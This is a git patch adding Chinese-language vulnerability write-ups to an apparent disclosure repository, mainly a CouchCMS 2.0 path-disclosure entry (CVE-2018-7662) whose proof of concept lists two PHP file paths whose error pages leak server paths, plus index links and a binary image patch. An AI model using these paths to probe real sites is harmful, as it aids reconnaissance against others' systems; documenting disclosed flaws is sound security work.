From 1e35392d14d6b7e63a2dbc5a355b9b059cceeb59 Mon Sep 17 00:00:00 2001
From: mr-xn <mrxn.net@gmail.com>
Date: Wed, 24 Jul 2019 12:22:41 +0800
Subject: [PATCH] upload

---
 Couch through 2.0存在路径泄露漏洞.md  |  21 +++++++++++++++++++
 README.md                             |   2 ++
 img/2.png                             | Bin 0 -> 11860 bytes
 img/3.png                             | Bin 0 -> 12720 bytes
 template.md                           |  27 +++++++++++++++++++++++++
 华为WS331a产品管理页面存在CSRF漏洞.md |  28 ++++++++++++++++++++++++++
 6 files changed, 78 insertions(+)
 create mode 100644 Couch through 2.0存在路径泄露漏洞.md
 create mode 100644 img/2.png
 create mode 100644 img/3.png
 create mode 100644 template.md
 create mode 100644 华为WS331a产品管理页面存在CSRF漏洞.md

diff --git a/Couch through 2.0存在路径泄露漏洞.md b/Couch through 2.0存在路径泄露漏洞.md
new file mode 100644
index 0000000..067a1d2
--- /dev/null
+++ b/Couch through 2.0存在路径泄露漏洞.md	
@@ -0,0 +1,21 @@
+### 漏洞简介  
+
+|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
+--------|--------|---------|--------|-------|----|------|
+|Couch through 2.0存在路径泄露漏洞|2018-03-04| zzw (zzw@5ecurity.cn)|[https://github.com/CouchCMS/CouchCMS/](https://github.com/CouchCMS/CouchCMS/) | [https://github.com/CouchCMS/CouchCMS/](https://github.com/CouchCMS/CouchCMS/) |2.0 | [CVE-2018-7662](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7662)|  
+
+
+#### 漏洞概述  
+
+> Couch through 2.0存在路径泄露漏洞，当访问特定url时系统返回的报错信息中暴露物理路径信息。Couch through是一个在github上开源的系统，漏洞发现者已经将漏洞信息通过[issues](https://github.com/CouchCMS/CouchCMS/issues/46)告知作者。  
+
+
+### POC实现代码如下：  
+
+------
+
+访问如下页面，报错信息中显示完整物理路径信息。
+
+    Location:
+    includes/mysql2i/mysql2i.func.php
+    addons/phpmailer/phpmailer.php
diff --git a/README.md b/README.md
index af9bad2..8082039 100644
--- a/README.md
+++ b/README.md
@@ -11,10 +11,12 @@
 ## IOT Device
 
 - [天翼创维awifi路由器存在多处未授权访问漏洞](天翼创维awifi路由器存在多处未授权访问漏洞.md)
+- [华为WS331a产品管理页面存在CSRF漏洞](华为WS331a产品管理页面存在CSRF漏洞.md)
 
 ## Web APP
 
 - [致远OA_A8_getshell_0day](致远OA_A8_getshell_0day.md)
+- [Couch through 2.0存在路径泄露漏洞](Couch through 2.0存在路径泄露漏洞.md)
 
 ## Mobile APP
 
diff --git a/img/2.png b/img/2.png
new file mode 100644
index 0000000000000000000000000000000000000000..ad76599a87e3a83d9b31cfdf3a827a96c904adfe
GIT binary patch
literal 11860
zcmd^lXIvB8*Dh9$h}h^w1f+vV5u}SEy-9BYgaFc!DpI1Ta46DSXi-WabV8F7auBH@
zAcPP?J(SRk1QH++xbgkJ@BMtg-h20l`R(7HnYH#>GqdJd&suRNM%p(RI2q{Z=x*rh
zXqwW|UGAmLGyl3uJ2qI8W9aDa)9Gqzn7_^6o~7?##^R6m+)+L=dh{OgU;nn&xNIj8
zhAnq8FCtz|FaLY=^{HKV9<*2U8vETymg1b8#rfA&FD0Z$t?S;u=VW>OzQ42uMF=>_
z3R@kT>v6@)w97UShIdi!c!cuy5FRf&qPCi-jnTcTw#(SB=vc*q78v^`WN|aO@9iBb
z0->+JJn-#fNi43tuaWe@=$Md&CYlBoe^Pxls;L@H>3BvF5aC<Dg`O7DpuX{Rm1>3g
zR&6cS&bp|fZDYCdzrBv->Rw9PLiDX2o5d1zTKoJG8yay29E4rSK*a@`!E|(A^Elp&
z1+BM^EG&|adzMHWH<7nd#J3%bBSCK6H2vQz#KNjuEd~#e$`)@c#halcrk0_X34M9Z
zgZUq*KiL$vf2EnWy4Q9Qb+viJ+B{+<JiSt}ALKn4gY`0zn!FBzOX24Icq|oY-~sqS
zh<zZDz4ca8?S}6ybaC8m-2SI8U#-DqKmTfutUh=e?fhSRqFcKY#}_s(PO6fr4&tEi
z%|M0Y2BNd%uW{`?N`5Pt_K<ae6SLd{4S^B8)AOz#WU21=YBGt4XJ4XZxp&xSI);Q{
z90{XIJzCIQhD6<i(Z?~yQhkONW$q2O|E(ZPr9Jx9sJr0H8L?_AN^kjeiZe1xP1Gvv
zRjw4AE;3}!f0^X+#V269&1Z~rxV+TOwBmUASUF1Sum!=F`zdiHTMRVR&x+yIQlwdA
z$t^&CLXU?V{6~5aJ)oND#e-(6`l^dAgM>&=SAX3SL$_8>h{v*L7{8Ak)(b5T^4mxW
zwDd{sspiRwKYO<tz=89xRGH}1ITsg6eQ%9>{=>B9_zTNSAI{FVDi`Qs^WQu7z2lzf
zip?;E9lQgQ|8XD|P^$0zQYqrp3Sp<tS6+c>C5x><2R4ihJDWV)^Q{3wvJ}gKE*3#(
zc76H&bug9^8rHTHS-e~Km*k3#q=F36bZ?-$2~*me9(LF8A4AJ(Tfvj92IJ0zKkr8n
zSF2KA(l*<G?t;Hg$DB^>f^wdnAoEsAfpUn>Ble8Pd3mMvk0k_RNZF~+H%dyXWX7t~
zmZ9EH$=+Ko5}xK^aWhZ8mYu%sW)iTg8oGNeDNN3B**7)U3RKO}1<ww>yi9;<aX74`
z->pCa?Oo&c+FItlF5_)~<jP$p@x-frTzzJYlHKO*cVGCDnlGO``Vs69Q2SPu(9Ylp
zWmA_4O;yCY4}3f0V-*(-Phgcy1IxM(ir03er4uA=;F?;A?0ij4;d4#0R#3zCr}BPt
z9n;~iuCBzbhLJ7lop=`UMB)l+u_u8L!+ZMFZ8jt?kyl;KkMK8XKp4V4LeK60v{3&d
z%@6nIS>>sAg|p=5s{I{ikLxdd16B`pJgk>D5W}gXSb?8+83r(45(u*sSBTd^uE1xJ
zM*?G_*QZbfN>|xHU4R#^N6hJ8Y;9|vovrJ3jFzY*Ngn_(#?OrLWtQH9RaB>4LA4BS
zq9#z|OSUC#+HqS7rdO`0-eLIMvx;ha#pzwNc(-NlU8M^30CW6M??b(!i^PW4W5O8o
z1aKJ2D)5vA&28rR0IS%ky}vcMH#VP=>BA3c3GLr)xy(;p2{&h+5?2dOFsQYft2~Qp
z>=?@oax>VKz36;48|@6J6fhg?>rae#sjAVNn2S6FfTdkxW<cjuMZ1-#lWk#M&}sc`
z^8qXWt#7es-YQa#o%X)p7p~&lg1yGx)P7%NfR&f0;2Ydg{iy<h7MdTYL{E{GwOOc#
z?FKdNXYX1ghx4QVN<u@_=bx-Gdpk+|s`8sr@Au9X@VzSvdjnOWIrynU$Vsj?u+{rE
zs8)<BrofH3m1QDwzr_cn>6YyvmZ#h@kU!z>`qfI^s&<oyLmQbi*BKbA!r`6T#YL3~
z+)ZeB`20Z~A=TK@I~6+deoMAotK;mRDH3L8tBhJse~ccR<H(A!gh))^ClZm<gnz&B
z!C=;sm#!YLK-7Gna8D!v{rtDskVl_SSJlt)OOe5V(_&ug>*T$~`H@UV>V_3OfS_l#
zw9~%Z8L-`in{tTxe4TAjFx#Gge+AtTIoBigrZ-2@ZZj;Hg^0O;HRX3GzH}B~T#_se
zSxE*ad!+uG4Gn(L{zGl42?}$s-GDnrh>2K|sNZEO8S7<4_slm&1XG>Bo%{spy$(?V
z{lKml6kpG26L%w?ATwzS07%l`d;2vtxY4CADPK}yZrTqi>0THHH7HcEaR}dTDp^uJ
zKiv-?<K4M#J~piBDBfkR>0IG#-5gdXM0;SCX&aZ1b`i7AGQM%+260$<mt9$s)ONqA
z3hkUrB4-PX_;wz<>365v*5e@9?czz?yoYZsZ%eKE`^BOt2`h~YB$L|I){!4}nqDk;
zxaY_5T7Up)bHmk#$~oG6Wx3(rG|=Ki>-Z}n5O0kYTR`)T$~Prcd5sCb&Td9mockn8
zcmdpDj1CYh&d|m|ilpIKL$fJ`RFitg&)O3;_4BTGS`Tk+=IT7fe!_2t|3gv%JjgZS
zNbKrh1qlrY+8}~LLN;(a&X@bPN}>Uv(<R=+w?FAoMN5JVMTBUEcyxg>ZoJ!@PV#QO
zM!i6?${6{WO+8kow@3(^HBe^?IduXg$X$LcYQ^D_tD|k@kj(&$l{2<V*Gaz3z8`dB
z{}@4xLR%C?yWOib1|7945pm~aO-}uab+MA57FVO%C#E~)YN#5E{v6N3!`a;^++XoL
zZ+_lZbc~XFl2tn-ja4Cz=}Tpv?6eyvsgfr%mMR<>AAbM$B8OVUcWHFGvD*4uj2_F|
zHgel$;@8Q^dY3PUOloWQ1)e}<CW&B0=*7>D$AeahQcHm&s_x^4T>~p$E1)ngSC9=+
z6Ob|YcIk`FO>NH}2ash;va=(otQ8S8(|JZ0KO#G#B7jDt+a28Vt~J1Y5cY8IVc%WD
zavsT+r0+iiIIcV72~{tIfK3!^uV#_&1mB*&&D0;w!yDgRY?k}3S@%A7nv>a6WQnC@
zT{K*YIpbTGk?4L5>D4RPZ=20PJHR(kV?;V5zA|}Bp{nfDbH4SL6}sP>?O7w?7D^xa
zyXuTXniDeCaeH6TlEf9{rt52@7``nm^X-pZ?x_B=I};EeBTjwMT+xulIAKmu<*Fa(
zWI7DRjmj1^gZ@3TD!a(MIk6q4S{6gv#2E`2<lJWi1ihS#c8{bS)XPOyOnAZ+fAv{+
zd=x(={#)nS8U?77@Vl;^YgzHS{;a|<QNrY!S7D7>cgLOIzS$(ixyXfc`8}^p!0ftq
zI~Eu6xGNF(_lx4N)X-X(ii2;>X>LK!$lna{FlZQ(y6v}rhdE);%HP08bHgcgHW*iW
zBfdw8vR3?Mef)V-Xh=n%R%T`hm4w@6rCk^5ZxCz^i+<JMhL$<AjKmlgC|R6F*&&lA
zntY5-&t4vC7S2-&k3E)AL$Ny%-`Lt!`{vGCZe{WEWF-f%e0+viE0ECkCa3c3OJyjb
zSY%0TkOdZX2WgxQUo~=e8jguS4x}G40c)VLB-5Lln*r$6D!JnDH`7J4!ybBwsMdgf
zd=|=vTh4=_X|NTMoUI!v#JTHzO>Pi(rfO!ZGz~0MGf;i@?Q2_Imd}Tj8F=f<nhgta
z2T0$Ok?S54GEMTno@tb7J`S}GEh!@%rArz%?X9|nXE;uqPAK3aB{&Qa3~LO&TnccE
zvPRZ8{vK6QbXoihAG-Dw|Gnwu)Rc0fZ%_d3QL>gsJCDZZshk}xY4zsBn>}E7_xTxL
zF~mO@QAN3LCjH6IxAldd-q8GmQ6@ZnbCq7cv|Bi13vyn3KgM!!xy>{V_#U>B;;{Zr
zUF-nIQm7M%s%x=nCP!JHU))W(gO-X)9(f(Vj^Pz^tQs?es_P|6Nc&m!=CtLTC2zjV
z&%u4o**J2zVzGlboa?ySQ$!rCBBB-M<(Q)8PgfK|!yR8hFkpF~T<PlESToo5vly=B
z;r5*=0TEV~8%cy>n^Mn!w!^t_RNbrY#MriQbY*R4E=DG2ta)I<L#Fk<$i#~K2Jivo
zLzy{h#I-ek&sWp;yOYJ{>(zH{--ew_E0M2bthS0x4lVE^8Kh)@QN0Khei0`3`0+sZ
zO?8RDl_BXu1@FoG*I6YV4Z|!<o(0#Mnwhzrny7n>l~iTj9)CuxjXC^zci+$RJRRs{
z<ClknK7u_mgN)g>?qTSGTa|36N!-IMv-#GEw@7=W{M;B`<VzRp`ZvhL<F(Zg<lKZv
zLdPrcbfejvuSdEq#Hvc(=@f`%_3+-;)sNNwLCX~Uk1fL%GfD8Mc5N}S@V`eK`9HiD
zO2w$wetMRhk(oJoo1UEB(E08?BaeyT=7is^)S1G&l|zqME+<^=8*iW}<EVD4c?>Zy
zw+u{~u|lpzuNjBSC3+^gwkM`>Vx^^}#BScRM>hr0*;2LH&b7(hx-UgBNI_Zp4Ajd^
zJ}?4i#`z;PqP9*uk=)DDY3Z@EpL0OGa^Q?*=aVWnalrOCJveRJ1O<O{2j;%8bk^$8
zJodnf8Zl32l<H>>W?DITG+t9X{oTE9ne?`Gm^*yoGh3pBFsUb=WjjTk<?)wXOY~BX
z%ND|e7Wt`8D+U5)60@u6v@o1$8#NcUx=lGrlpRjd=8ZJ(q+n}TfXC2ax6wlzc?`2i
zZkJ-^<mL#?vL1Wk5Ha$$07t{-GMO}jJEbdu+NxAJAg10{7oPu)Ro6+rr@EYBW|aD}
zm>=N5T>^2mt1n+S!{7GAlLV&Uk2wTHou|Wdvj>5B3cDJ|6r8Z``Pl%d!x7QuaJDyw
zlA)$uZ?H|OK1guD9+HLp(&fT!OULcRBK5oy)jAM-hRyW3rP7mPEEE!nDU!NEuOw)_
zl76M&g6Pe#lBvz?l%7t6Wfh(u&4VQ_+L6Y_8Vz%8yYKv!rFVZBv&ti<v}&dQ7cBhJ
z8sWxz@;!p9Dek!|!@CkV)F?MpZZKQ2GeBU<UM5$NOoPN*SsE)sVo%8bT)N55@ro9M
z=hKqPI^ESz@FR)$!5hkmTWL}GtNy$$qe3b5N!8?mF4aLoAzCBsmG<PCoxy1}KVntC
zK)pP9zF1rYO2O|k#CX^)s~Rr{f3NJO)@i5jqi&`{%vTgdLa-KA99<dD7~)?LWS&4N
zyKP5{Te~4e6x_SDZ?WDIsq9E=^eN<AnuR$bfVLwV7U%3T%dFt^t3{C0;_eFXQ0x$v
z)bWA{;y`#}W%S<_12t`}8pFXmLEgDQw3G9^@%X_5?C(h==5fP7XhT*IniDM-XYd$-
zCkW?hR}g#LKlUWuRUXpApuN@98+Kh~&Vk(pX`Zck@A-k4GTUanlA!_wh%#1~*@`gB
z6pw<WY^ll;P$h}$y$x_cYb154%(&^?SkCAnQXM~}p1%GeV(R;wC11k_*m{S@c+)QF
z_Kxx2HE&&pg=^RYvPLsxxGJj33PR#l_KwT~hBF%OT<z<$Zn9k&0XYmSoeWi>yvt0f
zGf2L==e|>i$^oXeZ-`yPECEYwH`&o09TY_im)B)-v35OWaIFK<ro^Fc>xjUGTH_y-
zVol`VmR+La%{$)NXtcw+-DWzODH2@$3MO)$gTuMY#9AqukA@*WcWbFT_W~qH7cH$c
zF9u{1T;Y-Wv7?cR1%Mt+*&mBN?w?-t1=>NaRam(7X?`bF`$g)X(V%YogGX84lch<q
zK0g4-DQAv#o442AMT~QfxmEd27)=v%<ULNPQyi3~gP4;>%t0S)8dO=(L3N-?Tb<O#
zv`*<x?~WRc^9sw&R7aLBfSQ&L`l?nyocqIN#Yswf;mfJoMEm%IiCV{61eH9U^w4D}
zN7~li-F*U6>48<*B2u{gUTgCPCPI1h8*-z16FH{p`*_L_`@_o3nH~daf>W)lg_Ve-
z#RLxHO6W_>Lx+yZW};@~+41U%mi^lTC?f2*Fu7c_o7EvNAWLC3D1Gm5kkshg^%a-k
zGgwyYHnG@r+twvkkW=amVZJ16XH;>BK?|f4T-#2|4K~!U^LTIl^_A6SvPbZDFwsU7
z)b?ikUZJj{^L#R>+3VPCQ*3rM+gC*#0xDWH$FM9>rWNN6kn?UWqd-&(93<U-eu20?
zs?Cda8!1F=?qwrSdnS$*uI4sj)Q@<#GY<W9j=mS4)mN?9IU=>%S9j(;xfFb-wyBxo
zYPhq*n%1e98(iBWoyUP&%)N;4)R2FEz^06?hA{W+&ZV}=7B@X&5z2;K$fIXIr^qs|
zd8&7_ybs=R>L^)iROlhNhNtO(-{(i#^)IVSbM5BJ6=!-rl(Ghi%mpjZJByQDyScF%
z<m&V7l@nGEwzE^o?JeHUih?&(@hL_1C^O~5UWKLx&_S+z*h=LT3`f;h-Wkkply&PY
zQa$Vq@adUy+vfF)DngKZm2Jbr+X)mAt!zLDSYS!X0|Paj`Wbh3AHdkR9lqEz^*v#C
zw0GpYu`;oJzwuhOdb#1z9B*Ts)v0bnlPIAkX}{e;QyF6wlX=BeXSXFWU*E7Yvrd?M
zfY}W11TYk~NVM7i)IMi+SGzFzA>OWL?TvR*y7XbtYC$L`Pg^pFY;XUNm}bQ`C^8a}
zcu#d|lwiGWAbsnvtx-lyyyI}L;NeVU%ib~21zTaEwUR?ACCBygwv-x(c^S^uP=wWw
z<MzPijO{@@sTCQ!^VFSC;)I<a2ZrgM%48NCSlUsmv%jHAi!19<<}c108-gip{<8Zc
z?$8|8bdAzrs^0BLsi?O>`A0ZQ%I|mxNQi&}I^cE2BP7%=Js|JC4*8t9;<0}AP!23V
zGDM;P$I3G9qBop3@6R?b0B4trMN6h}^NeLk_4VEsCGP$fGh<Z?hj;6OHpnQ%Xtwq9
z=O3$V8nj{<Ih;|ajy@5N<^rmI(fj$gSw1d@e}tnpIAwr!2DuS!QAy{G`H{n58K<Wp
zo6d;RQ)&;WUtw5P*i{x~k7;~=AYPqT)_nH--qvZ}c!qiZuffhcf6)tmb>wP^wG%84
z)+yb{o-P}nJ#Ck9jBr3UzQaBa`DMxxbE7=1r}8=6*`>_<wQ^}in;sMAs9mm|vMV;m
z65lE7Bw^<Yg}LQ9AnegT7s3|5d>PyP=yt8SDjm~z*i5oDj++aXaX6?+Uyl)JEmRF3
z94>&_oedSrx+fp{_7kV<@H8%=q0sV}7V6>oGW4OPi8LT4%5x_}TRBTl=lTGhpJ7Q{
z3Fjosk*S6Z$^D7x5P+HhV;p@c7)eNrkJF+*J(l;KdD2P?A%v6p^Uj%I9N-EYx0!}C
z_5#vV3&vz=#QDhSeHEa6V(p0<S4D#nw&d5t{ne2cm7CbAv6`>e84TVq9|A44Z+-Kl
zQc2!`)!ba+fywqi%F4=LJj^kZ9UF>5Z=58s0MX6-8~xA7f0YnSx4Hx<3b(`o_k|$n
zp8-v$&zKlm!>AXm%W9;c24MK+E{nJ&d*oH)oJSf=YDZ3}eNgKgj~~3Lm60sO;#ZiG
z@jNPE-`wAu2rfgV8>>jh@<f$O0EnIWp=ZqN(=ExF{L{YXSO<7hVBUe0c=|#nmO`o%
zDzHsBI@p&&o=KHAadb798tWiqnAWl}qej0~$6$^IhX;pguUIC0&FkiWb&j1Z-5`!m
zeLWJ>TNaNcWn+>!A5{BX03)3WB#!(Ws%9s|x>AHHN=qn1=JPHPA4dI?!FP(~e#HkB
zJkBR!&Zhw3;v%#-=7x5_bc<iMTBIq6&HR>x{1Z1p5h##%5<a+~*4t@speYw9QU000
zTL9T`T&p`ESq3*Py>$5`P_PkNn)MlBYjD*D$ka_m5H?-uSu{-~^kxYrvvGtC8VmFX
zk|(*lfiqEGbBdUv#41In|H;`XuDW&N5g5(j4||XEX_<AKk+<?ujw^rVO3^R@m`vjD
zse4hA@7Nrsoe>ywxEu?r4%DacGK8mmp=}VcaB(Z=Y=~i4Jhcc9Gdi5*x47yAKZL(p
zS-ENy!D_j>PA1Wt*we_rSEs+IM3fYldQPQ*%!^qQz1a_{W}#ockG-9{?VWmEtsVQe
zdPgs8Hf6sA<Y9~=@Tj~^$(LT21D|hQ4>%ha9cvF=m|Z7&QHA=s?AQi2n&0htXzZ=y
zenur%T%l$T{u;9-c@e&5c=9blL&WUF1JqVhjUxLOnob6#Stg=0p3@&>EFd-s=;S;g
z<m{5`&>Ys(YCU`E9zUD$oE;O7jUb3}B6j>cK}b~U%fWNY#eH2}T`*($Ek)u#g)(n{
z(G@4xr=@Lu1os#8B(UXecqwyoH*hkeYJYOLz@~$3Zt1dPfUo|&er?ThMr}@SeY1K3
zQkjTDL}JILiybycDD#ntxKwRN>h5#Bs~j5AkiZv1xeRMVxsUa05M*1MW^bF$g!KKd
zIRTXQGOmK-&kf%<<8rkOD|dR=Sj95G*VGurF!AIDaX&WrVs=YIy0p;<*zXbESu4|X
z$29@=1}pdCDWJo3Y#H@%kHcyp_hIj#tEF`tQ4x@Jl*lTm)-Bk1X(vdd++f9VYs&#?
zpgd))VDxZ9=_L=a{nWcx0Ru*)$A?k3=cL?~YJ=t>5j+a-pOq=iLF7ErZnK+J^Nv5C
zz40r)sle{%<{oD<jB1ooZ*hV*w+-%8)qHq9ml(|$FUl)lo#w|xX;X>l=Ls0eaqORw
zZW)MlaU1v|P@C3Os#+>IdEc<BI>4Xce~ey(3?e9Xt@Il=BWKik<g}B-AtJmApjR-)
zrY0;AyZ0P;@b!)j?p7L3ed?idXtU0vTPaVqpOWvH@TntTH_ng?sIIk~wU@Ez-qXxG
z-m_xQJwpb+oshCCDk>TQ{a+uId+qn}g6yG21)iR#i%jvNii7M4rW*CGU50lu>TVy6
zwebhOVv*VR)UqvKiA#j-Jb`^`-_gNO<DU0sGm7{B2~|ljiTl{HOiu?`wCQn5GVQxD
zg<_d@X`J+oWa$*+pY&%|wA*leHHgNk>`;_B%@gm*jk~`lY5oZLc&1-ctN~o&g7tCv
zdjn^fi`ba=BLDq~Ec-eCLc*b90Y682_)<}Z$9JVBvA(NJ6K@I26&JdmFX(B@flQpd
z^t9q|EOW%bY!JBrDBUovrq!xqL~XQjGy%W%ePG4U?IcLaZfFQ_I2H*q#X43T3+Kr<
zpULptQ$IhF0j5c2iA|<IlpWk6rdK-_d7yVdX*cvk*j^~qf|M+q=O@?U)H9%M@8mi<
z3RKOFd>>&3)~HavrCk0`&d6qZx0rT+Sfp{CYhh1OXK?zd>nf7=VLDz5x|%3tZTm=~
z6rF3Zu5RNnNlrT;;s(30v4b6kBMD_~jg<pgZkO-0e9kLzEF<k$YbCQw%qw}6&79A$
z5f_~eJuAePXIxHnU{Vhvy&@K`1?gyOKjl=`dm+Bg_n~=PrlLl}=$?W(nOD(Ns@Y0U
zUtco&(y;03I`WKE>pEWkGJux3th7H-Onc%oRIK>xp*Gsz=XJZB=QdzA(L?KG;Pu^s
z*SyZQxbF*V)|4j}b279No7FFkdh1=}dFN;=WeeXBc#j)pWg_88+Q0^^mu3%2w#+zF
zCTheC_xse(>PNjF<uPvt8L1rui_L!78@gvHy*%nw=;TXQCFi_JF$peH!daQGEc~G?
z-V7_Qatk=u=9(+Ln0<YJNvO__H7??;T&Fzp@Q}*F-(41ez~SY1LDIjC<1YGBl_;4~
z%u(8q@2i!w8%FT7>1jLbsWHhNy?9(S?1R18vBAIp>8{bEVV?$4J6fuLY=T9`t3Rk1
zRPUUMRSe0;ab@>!kiU#oHN`1#>vDViwUZK>r=BH1&&ywopbBp7_fMnGQ!Vmv{Xg5D
zm;5keJx(<{w^|WR74T%r_*kK3>i{7)TZU0*Gl}PpHUfN+oeGX}MpwzzSr%M&1oX}3
zK`&nKG>YMku`-zlC*$&{fhGEZ$>-W!*KUcKc!r9zW38;=YCp$M)?-!&3E7T?qep?O
z!@=bb;$X{+!ApsP`dRGP#4B_gH#W+gY$X+6|J22luByc*;8xj^ah2+)TEA_s1n^u-
z^tsuhmjI;*n&O?tf@25Q)RS*Nz^J6^0D>08ysCzlviauPqBqQj7+JW@gk_PZ1gS5t
zy&f(ri?EXB!go1%28|(VfMKQ0suIzLjq684vLpQ+Vf%?mYd4j*9%&Dnm4A@NE|Y1O
zKISKasGE)iSXp7(b*YYD?Bstx-sB7p-DzFrR4%2JMTSN@H{oipTl`p$M?UhSNvX)n
znD{LPKuO0V)6weF!JA*dEACOHppo&@IQ99e36|g+TfP%9+RGgdeJC~8OGH3M;^b|1
zeUXxZ`OpqYW1p}WF&0c2^3`U!%G1lplLG#wih@=Sdl6>&noSj3Yu2bbd)BB%Ei#w2
z=v-Pr7|1oD16lDRH!siC$*`SUtw@WB1CRTTataIkd=xPZOb~3}T&5LszWhuG>JAiq
z=_J8<s`q&4nl>-O{d{C2a2s2hoyrGIliB+IMoXT?cU$XYkb7FWtcKS#FS^8XT#&A9
z^Q!1$yOyGOn|<?FG(`Y-x%0u4T-hd{bk`%p5MC&o;YJ6`3pVBi3e7dkNy<C@HgfOQ
z$4a$=6d)S)BBbl7o|aQnQ)21D#`3v36-iGlViPuY(#7<*@a~YuJH6%6uPviA^vX;w
zxfrYLeUh;M{_FdVnyK3`I_raBUb`0G$G*#TKGX8W#ZeX@PhkRcAJY`A%=G?+zFjtI
zLAA<Vg^<g$I;j!NGm9M;AFO@2Nb*|V?h-ntww0BJ+7uXY-NN3jrK4lI`KK4azb%To
zm7by&r8A8famO-ZlP0XXoODz?9Vk^()6=fqlpF9@`o&fAV-lsMf@AGab20G_nb)-%
z6xxro?e2RA%UW@nWYd?`(Uvv#9-cFihqJiXs-I^1ZF+N9aRxFJ2V6qVzd2hB2{89y
z$c;=%%X~g*5l>mu3w2hGkystnOh;Hlz1bG77Q!9S&lhmI*N37J65P8TC%IlVsmW>-
zk)?GemETVV@=&4`t*}7}bG*}rk!sxOKIB{uK4^a6@OUJc;e#~I1^+l06}rTdKyx`x
zR&sBl6qZ2KCsiDhpz$w1i?ZK*b253h;BTeRmwfr6hJgOi?&0Wy8iQ>`qO@Ii>%Aq%
zWsB$!agN1yCKsfzBRTla-uxmsnIW}pAARYj%6-*vAtbhuA?FK^vgN(7<y7u0#y_<^
zzWrX;_hHUERjX?Oh<nt9>1|brBcUQv_sY-ri>XI78A%7yf7&l-gE`uq!)00NPtEmD
zZ-Rclw3gE!8MHAwldaJ5w~vbM|6btcaQV+Ee?ghv|IGf?11A2bvEiT0e)dcMwfJ6K
zaF~6+)}}$oQSd*4=>qPjNkgAG_Xb+|52*wDQ%<w4|F<OO$p3x+n#+G{uF>pe|Icar
zxWqp`q>b-){!f*s{*P@|{QuVqe0m{{nkhtn{KxXiWSS42elVdgnsoFS_fojrH?Gw7
zO0~fJb+GkoLcM+{pw_;K$*eevj;=ME_P>O9rkT@MPJ)+BBfvz9B<IXE*;1yv2@{zB
z(p|g5@#De(8})UvKu;Z{KKx{;^ysU#Ijy9&t)vJL9!QF7J!9NDt6BC!<Wq*r+JDL4
z{q$JbNID?k<PF>?e@ZIQd#(WgPCif#&$HQ_vRT%izZ6=w-8<CA{Np$uEE7~Va>Y0M
zMX&W~?eVDgsX>5fGh@HOLA2~ygQjx`?q+bIZOw-8S$N9&?`JRjT{n}QjXA5mxk9*~
z7yQLfaLEg8V_F({mCq?Wzxo0!W4HUc*}=#MV&uF3*)rBG2et}4`C@=er_>vt$|Ts-
zXRBL&1Ko3LkYBpw-g8iJg`7dttfI_6_4yWy_N#_8>5D+I*=D!H<~8!R@+`$}fHN=<
zv2wA`@4*l9d*GzJDe8p@>t`tlBoqA9>a<?{UEvCO--cP1!oDdFUr*<=zzEVk4H&ri
z3<hU1+b+9KWy3u?|7<7Ps3g%yoGfjxv3mG27WPt|?)?lrM>=cgeP#_H{PZ`FjkDF8
z7vgCXa;WYcY}1-nwfkvuMEoV!eo!|CtsZ3!1z+1k8CYJGjeMSSjQzQF0FDY--%zI%
zW|CwZW{$#W*<(5)yNc0>JfFEvW>Ge3TUcL#3^ckOg229z0qfbQMH(g69B01y?`7GO
zf}oSKXDJ>aM>jGDY{g|Idp@Youi+#XxUb*z&}c`B$Tv&LQMKxa7NWO|x0KujxpshI
zTT@JCHx!g_DkmXEkAXzQBfEQ*CmZG`lR#AeO1nO_B-{I(yPyob`=Yb6%x&crsbPqg
zgF8%Hzv^q%4^=k0INU(9ctfA{q~{B@RPjuoTRB-1sgnmz28>CHzdXJ}E%4=T&&u>|
z4f)%Fy+`d1fX-D`W%hIlCyohDti=JRtttq@oP8SyVDI+zjrk;!zR*iV->?7~p^155
z7u6QrXeK{x1&=f>TCh|<51MYlZp*SLH$#9Y<pydX;Zj>Dn3{gqbpXngh7D}Ho_(|@
z12*2O19qoJTHTQp$A|9`^euZQaqC&>dPPo+W=lZRLQRNO(ZaeK2Dl5hu{>27@^)W`
z8p_XX!DU1nz^;PfQh2!OjgjU3K~4C!aukH+JPQ5>ogqBiHr<nSY^Dw#5ssn`MMx2k
zRna}t4_U-<Y9V#+cAN<_y#BR6Px=!n?D|TZ5}{f~XyLo~%S=^?E;x9;6Zv1D+r8tA
zjb~!mwjPL+AeV6Zx-9Hw!!)RQ)7|30DR1kO9A2*8HIVW^wvD^&$?>tf?76q~H92b=
zOFoejq9)Q9riPnz(V%Un%1mfq*Gfp-^vYXj)NQ+%APqiYR36Nnpxb!QC{r=r6+9cY
zRZe40SK6b-zIa(yylXa%1xHAkW(ubVE1;6XOw~UNWY1&l?=4mJAG*5}rY=9_kCW|{
zVMug^Hw=;WJ#i63gNMU4zkc!>v`r6B)O;;9tC|3*wXA9)O$lu(Mt(@&>koPo5NkR?
z#N6Ex-U$}lI#DiIlyoxkJzR;YO`$=<z5(+@l$Rh1{d$x1aVLKJdcV0<Na<Eojl2Hp
zNyzq*;`=AU_-j!`LH5hq(pV52UUBHm+d6zEkww|88HzYtZ%%l2%AHO%NnhhfB^|G%
zVT1kC@Qe+UZ|>euNPq0y_rz_`tg3DEoec|e#BA(}S@p!LHVM53LjB-QV8{kNT?*Gs
zrcCv-&ZmF7S}9)NyC{cq-jqIzo;Bbp%bnX&$zRs&HHU{m?JR39xwig$u<93l(x@Mi
zWnENNzeC1D(>IEQ+mf3rjpFzE%77Z9ldpUSd-Z~D`}WB@LkqWUv(kw+>TcP$9SiMo
zFz|}GTT=Jvn`)g#sewcJ37*Zq9T(k*V;R?#@LWT1!XCR-f4-;WZRAK$xN32Z>u6sN
z-n$66J`e{@;8noZY3}QWEP&UuWdV9kU_y>$0uKuQJc0`LU|@0VoE(uI)pdn049MuD
zQH!!YcpfmY12N;`QTWjjwD++Y_D!2iE(}z;nQd_D&T_8g06&zih5#{c`#d@ppn+&T
zOLd5W+PUVEH5hbC2FC;DlY@qgAR=|F1!~h&hl*f>=16z=kmkvoGGhkxj{Y5=`GMXM
zaywV#$l#tb_U(XL>`u^PfiIU{XibVIw;(`OxV_x4g<6ufbCfXvAHybtUA_UPzkx^i
zZCYjUZg;m^?x1BIDqM3^lX4VU`_6paW*Z8U!C@xq_z~gRL;f>A@p+6lYUe=uA=rFX
zEhJyrTJcb>A)<2C*R7@7ybtvC2sqkj4P`40NzC(A3yHd2ogsjMTLZE(_hi8n!y_|;
zFOtlH)7DpW*ZxV_mf4zvZsn_C-%U}$_+XiI500%#a>2d64YEh6!FsR$A)ucOlp_O2
